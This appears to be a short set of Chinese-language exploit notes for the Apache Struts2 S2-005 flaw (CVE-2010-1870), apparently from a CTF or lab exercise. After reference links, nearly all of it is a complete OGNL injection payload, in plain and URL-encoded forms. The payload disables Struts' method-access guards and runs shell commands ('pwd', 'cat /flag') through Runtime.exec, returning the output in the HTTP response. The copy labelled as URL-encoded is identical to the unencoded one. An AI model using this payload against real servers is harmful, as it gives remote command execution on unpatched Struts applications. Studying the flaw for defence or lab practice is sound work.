CVE-2010-1870
https://nvd.nist.gov/vuln/detail/CVE-2010-1870
https://www.exploit-db.com/exploits/14360
https://cwiki.apache.org/confluence/display/WW/S2-005
S2-005
演示
1.验证
1('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\75\'pwd\'')(d))&(h)(('\43myret\75@java.lang.Runtime@getRuntime().exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&(m)(('\43myout\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(n)(('\43myout.getWriter().println(\43mystr)')(d))
url编码后
1('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\75\'pwd\'')(d))&(h)(('\43myret\75@java.lang.Runtime@getRuntime().exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&(m)(('\43myout\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(n)(('\43myout.getWriter().println(\43mystr)')(d))
2.利用
1('%5C43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('%5C43context%5B%5C'xwork.MethodAccessor.denyMethodExecution%5C'%5D%5C75false')(b))&('%5C43c')(('%5C43_memberAccess.excludeProperties%5C75@java.util.Collections@EMPTY_SET')(c))&(g)(('%5C43mycmd%5C75%5C'cat%20/flag%5C'')(d))&(h)(('%5C43myret%5C75@java.lang.Runtime@getRuntime().exec(%5C43mycmd)')(d))&(i)(('%5C43mydat%5C75new%5C40java.io.DataInputStream(%5C43myret.getInputStream())')(d))&(j)(('%5C43myres%5C75new%5C40byte%5B51020%5D')(d))&(k)(('%5C43mydat.readFully(%5C43myres)')(d))&(l)(('%5C43mystr%5C75new%5C40java.lang.String(%5C43myres)')(d))&(m)(('%5C43myout%5C75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(n)(('%5C43myout.getWriter().println(%5C43mystr)')(d))
